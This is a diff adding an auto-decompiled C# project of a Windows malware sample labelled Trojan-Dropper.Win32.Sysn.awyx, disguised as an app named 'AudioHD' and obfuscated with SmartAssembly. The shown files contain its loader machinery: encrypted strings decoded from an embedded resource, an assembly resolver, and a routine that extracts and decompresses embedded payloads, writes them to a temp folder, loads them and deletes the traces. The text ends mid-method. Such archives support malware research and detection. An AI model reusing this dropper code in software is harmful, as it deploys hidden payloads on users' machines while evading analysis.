auto-decompiled msil via petikvx

add

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/AssemblyInfo.cs

@@ -0,0 +1,10 @@
+using SmartAssembly.Attributes;
+using System.Reflection;
+using System.Runtime.CompilerServices;
+using System.Runtime.InteropServices;
+
+[assembly: PoweredBy("Powered by {smartassembly}")]
+[assembly: SuppressIldasm]
+[assembly: Guid("d8ed0cfd-2f50-437f-9336-eca298571eec")]
+[assembly: AssemblyFileVersion("1.0.0.0")]
+[assembly: AssemblyVersion("1.0.0.0")]

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/SmartAssembly/Attributes/PoweredByAttribute.cs

@@ -0,0 +1,17 @@
+// Decompiled with JetBrains decompiler
+// Type: SmartAssembly.Attributes.PoweredByAttribute
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+using System;
+
+namespace SmartAssembly.Attributes
+{
+  public sealed class PoweredByAttribute : Attribute
+  {
+    public PoweredByAttribute(string s)
+    {
+    }
+  }
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/SmartAssembly/Attributes/Token2000074.cs

@@ -0,0 +1,12 @@
+// Decompiled with JetBrains decompiler
+// Type: SmartAssembly.Attributes.Token2000074
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+namespace SmartAssembly.Attributes
+{
+  internal class Token2000074 : \u0024Unresolved\u0024Token\u003A2003FFF
+  {
+  }
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/Trojan-Dropper.Win32.Sysn.awyx.csproj

@@ -0,0 +1,139 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe-->
+  <PropertyGroup>
+    <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
+    <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
+    <ProjectGuid>{09CA8ED9-D968-44F9-B827-416CF2B4C5EA}</ProjectGuid>
+    <OutputType>WinExe</OutputType>
+    <AssemblyName>AudioHD</AssemblyName>
+    <ApplicationVersion>1.0.0.0</ApplicationVersion>
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
+    <PlatformTarget>AnyCPU</PlatformTarget>
+    <DebugSymbols>true</DebugSymbols>
+    <DebugType>full</DebugType>
+    <Optimize>false</Optimize>
+    <OutputPath>bin\Debug\</OutputPath>
+    <DefineConstants>DEBUG;TRACE</DefineConstants>
+    <ErrorReport>prompt</ErrorReport>
+    <WarningLevel>4</WarningLevel>
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
+    <PlatformTarget>AnyCPU</PlatformTarget>
+    <DebugType>pdbonly</DebugType>
+    <Optimize>true</Optimize>
+    <OutputPath>bin\Release\</OutputPath>
+    <DefineConstants>TRACE</DefineConstants>
+    <ErrorReport>prompt</ErrorReport>
+    <WarningLevel>4</WarningLevel>
+  </PropertyGroup>
+  <ItemGroup>
+    <Reference Include="System" />
+    <Reference Include="System.Management" />
+    <Reference Include="System.Windows.Forms" />
+  </ItemGroup>
+  <ItemGroup>
+    <Compile Include="_003CModule_003E.cs" />
+    <Compile Include="_0004\_0001.cs" />
+    <Compile Include="_0004\_0002.cs" />
+    <Compile Include="_0004\_0003.cs" />
+    <Compile Include="_0004\_0004.cs" />
+    <Compile Include="_0004\_0005.cs" />
+    <Compile Include="_0004\_0006.cs" />
+    <Compile Include="_0004\_0007.cs" />
+    <Compile Include="_0004\_0008.cs" />
+    <Compile Include="_0004\Token2000076.cs" />
+    <Compile Include="_0010\_0001.cs" />
+    <Compile Include="_0010\Token200007D.cs" />
+    <Compile Include="_000F\_0001.cs" />
+    <Compile Include="_000F\_0002.cs" />
+    <Compile Include="_000F\_0003.cs" />
+    <Compile Include="_000F\_0004.cs" />
+    <Compile Include="_000F\_0005.cs" />
+    <Compile Include="_000F\_0006.cs" />
+    <Compile Include="_000F\_0007.cs" />
+    <Compile Include="_000F\_0008.cs" />
+    <Compile Include="_000F\Token200007C.cs" />
+    <Compile Include="_000E\_0001.cs" />
+    <Compile Include="_000E\_0002.cs" />
+    <Compile Include="_000E\_0003.cs" />
+    <Compile Include="_000E\_0004.cs" />
+    <Compile Include="_000E\_0005.cs" />
+    <Compile Include="_000E\_0006.cs" />
+    <Compile Include="_000E\_0007.cs" />
+    <Compile Include="_000E\_0008.cs" />
+    <Compile Include="_000E\Token200007B.cs" />
+    <Compile Include="_0008\_0001.cs" />
+    <Compile Include="_0008\_0002.cs" />
+    <Compile Include="_0008\_0003.cs" />
+    <Compile Include="_0008\_0004.cs" />
+    <Compile Include="_0008\_0005.cs" />
+    <Compile Include="_0008\_0006.cs" />
+    <Compile Include="_0008\_0007.cs" />
+    <Compile Include="_0008\_0008.cs" />
+    <Compile Include="_0008\Token200007A.cs" />
+    <Compile Include="_0007\_0001.cs" />
+    <Compile Include="_0007\_0002.cs" />
+    <Compile Include="_0007\_0003.cs" />
+    <Compile Include="_0007\_0004.cs" />
+    <Compile Include="_0007\_0005.cs" />
+    <Compile Include="_0007\_0006.cs" />
+    <Compile Include="_0007\_0007.cs" />
+    <Compile Include="_0007\_0008.cs" />
+    <Compile Include="_0007\Token2000079.cs" />
+    <Compile Include="_0006\_0001.cs" />
+    <Compile Include="_0006\_0002.cs" />
+    <Compile Include="_0006\_0003.cs" />
+    <Compile Include="_0006\_0004.cs" />
+    <Compile Include="_0006\_0005.cs" />
+    <Compile Include="_0006\_0006.cs" />
+    <Compile Include="_0006\_0007.cs" />
+    <Compile Include="_0006\_0008.cs" />
+    <Compile Include="_0006\Token2000078.cs" />
+    <Compile Include="_0002\_0001.cs" />
+    <Compile Include="_0002\_0002.cs" />
+    <Compile Include="_0002\_0003.cs" />
+    <Compile Include="_0002\_0004.cs" />
+    <Compile Include="_0002\_0005.cs" />
+    <Compile Include="_0002\_0006.cs" />
+    <Compile Include="_0002\_0007.cs" />
+    <Compile Include="_0002\_0008.cs" />
+    <Compile Include="_0002\Token2000073.cs" />
+    <Compile Include="SmartAssembly\Attributes\PoweredByAttribute.cs" />
+    <Compile Include="SmartAssembly\Attributes\Token2000074.cs" />
+    <Compile Include="_0001\_0001.cs" />
+    <Compile Include="_0001\_0002.cs" />
+    <Compile Include="_0001\_0003.cs" />
+    <Compile Include="_0001\_0004.cs" />
+    <Compile Include="_0001\_0005.cs" />
+    <Compile Include="_0001\_0006.cs" />
+    <Compile Include="_0001\_0007.cs" />
+    <Compile Include="_0001\_0008.cs" />
+    <Compile Include="_0001\Token2000072.cs" />
+    <Compile Include="_0003\_0001.cs" />
+    <Compile Include="_0003\_0002.cs" />
+    <Compile Include="_0003\_0003.cs" />
+    <Compile Include="_0003\_0004.cs" />
+    <Compile Include="_0003\_0005.cs" />
+    <Compile Include="_0003\_0006.cs" />
+    <Compile Include="_0003\_0007.cs" />
+    <Compile Include="_0003\_0008.cs" />
+    <Compile Include="_0003\Token2000075.cs" />
+    <Compile Include="_0005\_0001.cs" />
+    <Compile Include="_0005\_0002.cs" />
+    <Compile Include="_0005\_0003.cs" />
+    <Compile Include="_0005\_0004.cs" />
+    <Compile Include="_0005\_0005.cs" />
+    <Compile Include="_0005\_0006.cs" />
+    <Compile Include="_0005\_0007.cs" />
+    <Compile Include="_0005\_0008.cs" />
+    <Compile Include="_0005\Token2000077.cs" />
+    <Compile Include="AssemblyInfo.cs" />
+  </ItemGroup>
+  <ItemGroup>
+    <EmbeddedResource Include="{a0e71a64-a2d6-4ef9-921d-617ac9a8d428}" />
+    <EmbeddedResource Include="{a79492aa-5faa-4ed2-acc6-3d90ad665d99}" />
+  </ItemGroup>
+  <Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
+</Project>

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/Trojan-Dropper.Win32.Sysn.awyx.sln

@@ -0,0 +1,20 @@
+
+Microsoft Visual Studio Solution File, Format Version 9.00
+# Visual Studio 2005
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "AudioHD", "Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.csproj", "{09CA8ED9-D968-44F9-B827-416CF2B4C5EA}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Any CPU = Debug|Any CPU
+		Release|Any CPU = Release|Any CPU
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{09CA8ED9-D968-44F9-B827-416CF2B4C5EA}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+		{09CA8ED9-D968-44F9-B827-416CF2B4C5EA}.Debug|Any CPU.Build.0 = Debug|Any CPU
+		{09CA8ED9-D968-44F9-B827-416CF2B4C5EA}.Release|Any CPU.ActiveCfg = Release|Any CPU
+		{09CA8ED9-D968-44F9-B827-416CF2B4C5EA}.Release|Any CPU.Build.0 = Release|Any CPU
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+EndGlobal

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0001/Token2000072.cs

@@ -0,0 +1,12 @@
+// Decompiled with JetBrains decompiler
+// Type: 
.Token2000072
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+namespace \u0001
+{
+  internal class Token2000072 : \u0024Unresolved\u0024Token\u003A2003FFF
+  {
+  }
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0001/_0001.cs

@@ -0,0 +1,60 @@
+// Decompiled with JetBrains decompiler
+// Type: 
.

+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+using System;
+using System.Diagnostics;
+using System.Runtime.InteropServices;
+using System.Windows.Forms;
+
+namespace \u0001
+{
+  internal sealed class \u0001
+  {
+    private static \u0001.\u0001 \u0001;
+    private long \u0001 = DateTime.Now.Ticks;
+
+    [DllImport("kernel32", EntryPoint = "SetProcessWorkingSetSize")]
+    private static extern int \u000F(
+      IntPtr process,
+      int minimumWorkingSetSize,
+      int maximumWorkingSetSize);
+
+    private void \u000F()
+    {
+      try
+      {
+        using (Process currentProcess = Process.GetCurrentProcess())
+          \u0001.\u0001.\u000F(currentProcess.Handle, -1, -1);
+      }
+      catch
+      {
+      }
+    }
+
+    private void \u000F(object sender, EventArgs e)
+    {
+      long ticks = DateTime.Now.Ticks;
+      if (ticks - this.\u0001 <= 10000000L)
+        return;
+      this.\u0001 = ticks;
+      this.\u000F();
+    }
+
+    private \u0001()
+    {
+      // ISSUE: method pointer
+      Application.Idle += new EventHandler((object) this, __methodptr(\u000F));
+      this.\u000F();
+    }
+
+    public static void \u0010()
+    {
+      if (Environment.OSVersion.Platform != PlatformID.Win32NT)
+        return;
+      \u0001.\u0001.\u0001 = new \u0001.\u0001();
+    }
+  }
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0001/_0002.cs

@@ -0,0 +1,10 @@
+// Decompiled with JetBrains decompiler
+// Type: 
.
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+namespace \u0001
+{
+  internal delegate string \u0002(int i);
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0001/_0003.cs

@@ -0,0 +1,53 @@
+// Decompiled with JetBrains decompiler
+// Type: 
.
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+using \u0001;
+using System;
+using System.Diagnostics;
+using System.Reflection;
+using System.Reflection.Emit;
+
+namespace \u0001
+{
+  internal static class \u0003
+  {
+    public static void \u000F()
+    {
+      Type declaringType = new StackTrace().GetFrame(1).GetMethod().DeclaringType;
+      foreach (FieldInfo field in declaringType.GetFields(BindingFlags.Static | BindingFlags.NonPublic | BindingFlags.GetField))
+      {
+        try
+        {
+          if ((object) field.FieldType == (object) typeof (\u0002))
+          {
+            DynamicMethod dynamicMethod = new DynamicMethod(string.Empty, typeof (string), new Type[1]
+            {
+              typeof (int)
+            }, declaringType, true);
+            ILGenerator ilGenerator = dynamicMethod.GetILGenerator();
+            ilGenerator.Emit(OpCodes.Ldarg_0);
+            foreach (MethodInfo method in typeof (\u0004).GetMethods(BindingFlags.Static | BindingFlags.Public))
+            {
+              if ((object) method.ReturnType == (object) typeof (string))
+              {
+                ilGenerator.Emit(OpCodes.Ldc_I4, field.MetadataToken & 16777215);
+                ilGenerator.Emit(OpCodes.Sub);
+                ilGenerator.Emit(OpCodes.Call, method);
+                break;
+              }
+            }
+            ilGenerator.Emit(OpCodes.Ret);
+            field.SetValue((object) null, (object) (\u0002) dynamicMethod.CreateDelegate(typeof (\u0002)));
+            break;
+          }
+        }
+        catch
+        {
+        }
+      }
+    }
+  }
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0001/_0004.cs

@@ -0,0 +1,119 @@
+// Decompiled with JetBrains decompiler
+// Type: 
.
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+using \u0001;
+using System;
+using System.Collections;
+using System.IO;
+using System.Reflection;
+using System.Runtime.InteropServices;
+using System.Text;
+
+namespace \u0001
+{
+  internal sealed class \u0004
+  {
+    [NonSerialized]
+    internal static \u0002 \u0001;
+    private static string \u0001;
+    private static string \u0002;
+    private static byte[] \u0001;
+    private static Hashtable \u0001;
+    private static bool \u0001;
+    private static int \u0001;
+
+    public static string \u000F([In] int obj0)
+    {
+      obj0 -= \u0004.\u0001;
+      if (\u0004.\u0001)
+      {
+        string str = (string) \u0004.\u0001[(object) obj0];
+        if (str != null)
+          return str;
+      }
+      int num1 = obj0;
+      byte[] numArray1 = \u0004.\u0001;
+      int index1 = num1;
+      int index2 = index1 + 1;
+      int num2 = (int) numArray1[index1];
+      int count;
+      if ((num2 & 128) == 0)
+      {
+        count = num2;
+        if (count == 0)
+          return string.Empty;
+      }
+      else if ((num2 & 64) == 0)
+      {
+        count = ((num2 & 63) << 8) + (int) \u0004.\u0001[index2++];
+      }
+      else
+      {
+        int num3 = (num2 & 31) << 24;
+        byte[] numArray2 = \u0004.\u0001;
+        int index3 = index2;
+        int num4 = index3 + 1;
+        int num5 = (int) numArray2[index3] << 16;
+        int num6 = num3 + num5;
+        byte[] numArray3 = \u0004.\u0001;
+        int index4 = num4;
+        int num7 = index4 + 1;
+        int num8 = (int) numArray3[index4] << 8;
+        int num9 = num6 + num8;
+        byte[] numArray4 = \u0004.\u0001;
+        int index5 = num7;
+        index2 = index5 + 1;
+        int num10 = (int) numArray4[index5];
+        count = num9 + num10;
+      }
+      try
+      {
+        byte[] bytes = Convert.FromBase64String(Encoding.UTF8.GetString(\u0004.\u0001, index2, count));
+        string str = string.Intern(Encoding.UTF8.GetString(bytes, 0, bytes.Length));
+        if (\u0004.\u0001)
+        {
+          try
+          {
+            \u0004.\u0001.Add((object) obj0, (object) str);
+          }
+          catch
+          {
+          }
+        }
+        return str;
+      }
+      catch
+      {
+        return (string) null;
+      }
+    }
+
+    static \u0004()
+    {
+      \u0003.\u000F();
+      \u0004.\u0001 = "1";
+      \u0004.\u0002 = "191";
+      \u0004.\u0001 = (byte[]) null;
+      \u0004.\u0001 = (Hashtable) null;
+      \u0004.\u0001 = false;
+      \u0004.\u0001 = 0;
+      if (\u0004.\u0001 == "1")
+      {
+        \u0004.\u0001 = true;
+        \u0004.\u0001 = new Hashtable();
+      }
+      \u0004.\u0001 = Convert.ToInt32(\u0004.\u0002);
+      using (Stream manifestResourceStream = Assembly.GetExecutingAssembly().GetManifestResourceStream("{a79492aa-5faa-4ed2-acc6-3d90ad665d99}"))
+      {
+        int int32 = Convert.ToInt32(manifestResourceStream.Length);
+        byte[] buffer = new byte[int32];
+        manifestResourceStream.Read(buffer, 0, int32);
+        \u0004.\u0001 = \u0007.\u000F(buffer);
+        manifestResourceStream.Close();
+      }
+    }
+  }
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0001/_0005.cs

@@ -0,0 +1,25 @@
+// Decompiled with JetBrains decompiler
+// Type: 
.
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+using \u0001;
+using System;
+
+namespace \u0001
+{
+  internal sealed class \u0005
+  {
+    public static void \u000F()
+    {
+      try
+      {
+        \u0006.\u000F();
+      }
+      catch (Exception ex)
+      {
+      }
+    }
+  }
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0001/_0006.cs

@@ -0,0 +1,50 @@
+// Decompiled with JetBrains decompiler
+// Type: 
.
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+using \u0001;
+using System;
+using System.Reflection;
+using System.Runtime.InteropServices;
+
+namespace \u0001
+{
+  internal sealed class \u0006
+  {
+    private static Assembly \u0001 = (Assembly) null;
+    private static string[] \u0001 = new string[0];
+
+    internal static void \u000F()
+    {
+      try
+      {
+        AppDomain.CurrentDomain.ResourceResolve += new ResolveEventHandler(\u0006.\u000F);
+      }
+      catch (Exception ex)
+      {
+      }
+    }
+
+    internal static Assembly \u000F([In] object obj0, [In] ResolveEventArgs obj1)
+    {
+      if ((object) \u0006.\u0001 == null)
+      {
+        lock (\u0006.\u0001)
+        {
+          \u0006.\u0001 = Assembly.Load(\u0004.\u000F(192));
+          if ((object) \u0006.\u0001 != null)
+            \u0006.\u0001 = \u0006.\u0001.GetManifestResourceNames();
+        }
+      }
+      string name = obj1.Name;
+      for (int index = 0; index < \u0006.\u0001.Length; ++index)
+      {
+        if (\u0006.\u0001[index] == name)
+          return \u0006.\u0001;
+      }
+      return (Assembly) null;
+    }
+  }
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0001/_0008.cs

@@ -0,0 +1,51 @@
+// Decompiled with JetBrains decompiler
+// Type: 
.
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+using \u0001;
+using System.Runtime.InteropServices;
+
+namespace \u0001
+{
+  internal sealed class \u0008
+  {
+    internal static long \u0001;
+    internal static long \u0002;
+    internal static \u0008.\u0001 \u0001;
+    internal static \u0008.\u0001 \u0002;
+    internal static \u0008.\u0002 \u0001;
+    internal static \u0008.\u0002 \u0002;
+    internal static \u0008.\u0003 \u0001;
+    internal static \u0008.\u0003 \u0002;
+    internal static \u0008.\u0004 \u0001;
+    internal static \u0008.\u0004 \u0002;
+    internal static \u0008.\u0005 \u0001;
+
+    [StructLayout(LayoutKind.Explicit, Size = 116, Pack = 1)]
+    private struct \u0001
+    {
+    }
+
+    [StructLayout(LayoutKind.Explicit, Size = 120, Pack = 1)]
+    private struct \u0002
+    {
+    }
+
+    [StructLayout(LayoutKind.Explicit, Size = 12, Pack = 1)]
+    private struct \u0003
+    {
+    }
+
+    [StructLayout(LayoutKind.Explicit, Size = 76, Pack = 1)]
+    private struct \u0004
+    {
+    }
+
+    [StructLayout(LayoutKind.Explicit, Size = 16, Pack = 1)]
+    private struct \u0005
+    {
+    }
+  }
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0002/Token2000073.cs

@@ -0,0 +1,12 @@
+// Decompiled with JetBrains decompiler
+// Type: .Token2000073
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+namespace \u0002
+{
+  internal class Token2000073 : \u0024Unresolved\u0024Token\u003A2003FFF
+  {
+  }
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0002/_0001.cs

@@ -0,0 +1,301 @@
+// Decompiled with JetBrains decompiler
+// Type: .

+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+using \u0001;
+using System;
+using System.Collections;
+using System.Diagnostics;
+using System.IO;
+using System.Reflection;
+using System.Runtime.CompilerServices;
+using System.Runtime.InteropServices;
+using System.Text;
+
+namespace \u0002
+{
+  internal sealed class \u0001
+  {
+    private static Hashtable \u0001 = new Hashtable();
+
+    [DllImport("kernel32", EntryPoint = "MoveFileEx")]
+    private static extern bool \u000F([In] string obj0, [In] string obj1, [In] int obj2);
+
+    [SpecialName]
+    internal static bool \u000F()
+    {
+      try
+      {
+        string lower = Process.GetCurrentProcess().MainModule.ModuleName.ToLower();
+        if (lower == \u0004.\u000F(289))
+          return true;
+        if (lower == \u0004.\u000F(302))
+          return true;
+      }
+      catch (Exception ex)
+      {
+      }
+      return false;
+    }
+
+    internal static void \u000F()
+    {
+      try
+      {
+        AppDomain.CurrentDomain.AssemblyResolve += new ResolveEventHandler(\u0002.\u0001.\u000F);
+        if (!Assembly.GetExecutingAssembly().GlobalAssemblyCache || !\u0002.\u0001.\u000F())
+          return;
+        string[] strArray = \u0004.\u000F(323).Split(',');
+        for (int index = 0; index < strArray.Length - 1; index += 2)
+        {
+          try
+          {
+            string str1 = Encoding.UTF8.GetString(Convert.FromBase64String(strArray[index]));
+            string str2 = strArray[index + 1];
+            if (str2.Length > 0)
+            {
+              if (str2[0] == '[')
+              {
+                int num = str2.IndexOf(']');
+                string str3 = str2.Substring(1, num - 1);
+                string name = str2.Substring(num + 1);
+                bool flag = str3.IndexOf('z') >= 0;
+                if (str3.IndexOf('f') >= 0)
+                {
+                  Stream manifestResourceStream = Assembly.GetExecutingAssembly().GetManifestResourceStream(name);
+                  if (manifestResourceStream != null)
+                  {
+                    int length = (int) manifestResourceStream.Length;
+                    byte[] buffer = new byte[length];
+                    manifestResourceStream.Read(buffer, 0, length);
+                    if (flag)
+                      buffer = \u0007.\u000F(buffer);
+                    try
+                    {
+                      string path1 = string.Format(\u0004.\u000F(541), (object) Path.GetTempPath(), (object) name);
+                      Directory.CreateDirectory(path1);
+                      \u0002.\u0001.\u0001 obj = new \u0002.\u0001.\u0001(str1);
+                      string path2 = path1 + obj.\u0001 + \u0004.\u000F(554);
+                      if (!File.Exists(path2))
+                      {
+                        FileStream fileStream = File.OpenWrite(path2);
+                        fileStream.Write(buffer, 0, buffer.Length);
+                        fileStream.Close();
+                      }
+                      \u0002.\u0002.\u000F(path2);
+                      try
+                      {
+                        File.Delete(path2);
+                        Directory.Delete(path1);
+                      }
+                      catch
+                      {
+                      }
+                    }
+                    catch (Exception ex)
+                    {
+                    }
+                  }
+                }
+              }
+            }
+          }
+          catch (Exception ex)
+          {
+          }
+        }
+      }
+      catch (Exception ex)
+      {
+      }
+    }
+
+    internal static Assembly \u000F([In] object obj0, [In] ResolveEventArgs obj1)
+    {
+      \u0002.\u0001.\u0001 obj = new \u0002.\u0001.\u0001(obj1.Name);
+      string base64String1 = Convert.ToBase64String(Encoding.UTF8.GetBytes(obj.\u000F(false)));
+      string[] strArray = \u0004.\u000F(323).Split(',');
+      string str1 = string.Empty;
+      bool flag1 = false;
+      bool flag2 = false;
+      bool flag3 = false;
+      for (int index = 0; index < strArray.Length - 1; index += 2)
+      {
+        if (strArray[index] == base64String1)
+        {
+          str1 = strArray[index + 1];
+          break;
+        }
+      }
+      if (str1.Length == 0 && obj.\u0003.Length == 0)
+      {
+        string base64String2 = Convert.ToBase64String(Encoding.UTF8.GetBytes(obj.\u0001));
+        for (int index = 0; index < strArray.Length - 1; index += 2)
+        {
+          if (strArray[index] == base64String2)
+          {
+            str1 = strArray[index + 1];
+            break;
+          }
+        }
+      }
+      if (str1.Length > 0)
+      {
+        if (str1[0] == '[')
+        {
+          int num = str1.IndexOf(']');
+          string str2 = str1.Substring(1, num - 1);
+          flag1 = str2.IndexOf('z') >= 0;
+          flag2 = str2.IndexOf('g') >= 0;
+          flag3 = str2.IndexOf('t') >= 0;
+          str1 = str1.Substring(num + 1);
+        }
+        lock (\u0002.\u0001.\u0001)
+        {
+          if (\u0002.\u0001.\u0001.ContainsKey((object) str1))
+            return (Assembly) \u0002.\u0001.\u0001[(object) str1];
+        }
+        Stream manifestResourceStream = Assembly.GetExecutingAssembly().GetManifestResourceStream(str1);
+        if (manifestResourceStream != null)
+        {
+          int length = (int) manifestResourceStream.Length;
+          byte[] numArray = new byte[length];
+          manifestResourceStream.Read(numArray, 0, length);
+          if (flag1)
+            numArray = \u0007.\u000F(numArray);
+          if (flag2)
+          {
+            try
